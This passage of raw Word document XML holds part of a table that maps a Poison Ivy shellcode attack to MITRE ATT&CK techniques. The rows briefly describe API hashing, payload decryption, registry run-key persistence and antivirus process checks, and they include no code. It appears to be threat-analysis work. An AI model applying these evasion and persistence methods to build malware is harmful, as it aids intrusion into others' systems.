                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D903CAE" w14:textId="71B2B528" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="00593B1C" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5174D2D3" w14:textId="77777777" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09C8CCFC" w14:textId="6FDCB158" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="00593B1C" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="776C9B56" w14:textId="4E799B79" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="009C415E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C903080" w14:textId="1BA06C59" w:rsidR="004F01AF" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[1</w:t>
            </w:r>
            <w:r w:rsidRPr="004F01AF">
              <w:t xml:space="preserve"> The secondary shellcode starts by resolving the following API functions using a ROT13 hashing algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5595F" w:rsidRPr="002D1D50" w14:paraId="41DD0218" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A7E4D2" w14:textId="7453A081" w:rsidR="00F5595F" w:rsidRDefault="004F01AF" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F01AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18024633" w14:textId="1D2D6287" w:rsidR="00F5595F" w:rsidRPr="002D1D50" w:rsidRDefault="00B22303" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A4BDA4F" w14:textId="0BE01957" w:rsidR="00F5595F" w:rsidRPr="002D1D50" w:rsidRDefault="00B22303" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B02E2FD" w14:textId="008C79E1" w:rsidR="00F5595F" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78CAD907" w14:textId="77777777" w:rsidR="00F5595F" w:rsidRPr="002D1D50" w:rsidRDefault="00F5595F" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F4C892" w14:textId="282C586C" w:rsidR="00F5595F" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01BF5997" w14:textId="4D2132BC" w:rsidR="00F5595F" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24DCB373" w14:textId="3ED131B1" w:rsidR="00F5595F" w:rsidRDefault="00B22303" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B65FA1" w:rsidRPr="0035652A" w14:paraId="10324A4F" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="302956AD" w14:textId="3C46EE59" w:rsidR="0035652A" w:rsidRPr="0035652A" w:rsidRDefault="004F01AF" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CEF0B0E" w14:textId="2F26F0F9" w:rsidR="0035652A" w:rsidRPr="0035652A" w:rsidRDefault="0035652A" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005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Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3987FA9E" w14:textId="3643BF68" w:rsidR="0035652A" w:rsidRPr="0035652A" w:rsidRDefault="0035652A" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140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Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0035652A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30A653C5" w14:textId="3322B9EE" w:rsidR="0035652A" w:rsidRPr="0035652A" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77E87445" w14:textId="77777777" w:rsidR="0035652A" w:rsidRPr="0035652A" w:rsidRDefault="0035652A" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BC174C0" w14:textId="5643BBC6" w:rsidR="0035652A" w:rsidRPr="0035652A" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37A8C2FE" w14:textId="02DA0C66" w:rsidR="0035652A" w:rsidRPr="0035652A" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56D174DA" w14:textId="1E3D00C2" w:rsidR="0035652A" w:rsidRDefault="00B65FA1" w:rsidP="00B65FA1">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00B65FA1">
              <w:t>The shellcode then enters a decryption loop to convert the embedded payload from ciphertext to cleartext.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2552CF9F" w14:textId="680E3F6F" w:rsidR="00A56237" w:rsidRDefault="00A56237" w:rsidP="00B65FA1">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A56237">
              <w:t>the algorithm decrypts what is an embedded portable executable that acts as the payload in this attack. The embedded payload is written to %APPDATA\Identities\Identities.ocx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="604D4A8F" w14:textId="3B80A9E7" w:rsidR="004F01AF" w:rsidRPr="004F01AF" w:rsidRDefault="004F01AF" w:rsidP="00B65FA1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="004F01AF">
              <w:t>Delivered Payload – Poison Ivy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035652A" w:rsidRPr="002D1D50" w14:paraId="1123FE13" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57582093" w14:textId="1028CC8C" w:rsidR="0035652A" w:rsidRPr="0001498C" w:rsidRDefault="0067080D" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0001498C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AE67AA5" w14:textId="7CC7F6F8" w:rsidR="0035652A" w:rsidRPr="0001498C" w:rsidRDefault="0067080D" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0001498C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0001498C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0001498C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26FC0494" w14:textId="1036760C" w:rsidR="0035652A" w:rsidRPr="0001498C" w:rsidRDefault="0067080D" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0001498C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1518.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0001498C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Software Discovery: Security Software Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D486654" w14:textId="300E147B" w:rsidR="0035652A" w:rsidRPr="00593B1C" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00593B1C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D8A5FB5" w14:textId="77777777" w:rsidR="0035652A" w:rsidRPr="00593B1C" w:rsidRDefault="0035652A" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50868FA0" w14:textId="273480FC" w:rsidR="0035652A" w:rsidRPr="00593B1C" w:rsidRDefault="00593B1C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5540C40A" w14:textId="15EFD42D" w:rsidR="0035652A" w:rsidRPr="00593B1C" w:rsidRDefault="009C415E" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30ADA873" w14:textId="1E96B181" w:rsidR="0035652A" w:rsidRDefault="0001498C" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A56237">
              <w:t>Before running the above command to open the decoy document, the shellcode enumerates the running processes on the system, specifically looking for processes created for an executable with a filename that starts with “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A56237">
              <w:t>avp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A56237">
              <w:t xml:space="preserve">.”, presumably in an attempt to find Kaspersky’s </w:t>
            </w:r>
            <w:r w:rsidRPr="00A56237">
              <w:lastRenderedPageBreak/>
              <w:t>antivirus process. If the process is found, the shellcode will not open the decoy document and exits</w:t>
            </w:r>
            <w:r w:rsidR="003777B8">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF7C25" w:rsidRPr="002D1D50" w14:paraId="022D71FF" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B200675" w14:textId="2823AEFE" w:rsidR="00BF7C25" w:rsidRDefault="00BF7C25" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F01AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009B2E2E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A49D76" w14:textId="77777777" w:rsidR="00BF7C25" w:rsidRPr="002D1D50" w:rsidRDefault="00BF7C25" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14397204" w14:textId="77777777" w:rsidR="00BF7C25" w:rsidRPr="002D1D50" w:rsidRDefault="00BF7C25" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B22303">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AD7B521" w14:textId="09741CED" w:rsidR="00BF7C25" w:rsidRPr="00593B1C" w:rsidRDefault="00593B1C" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
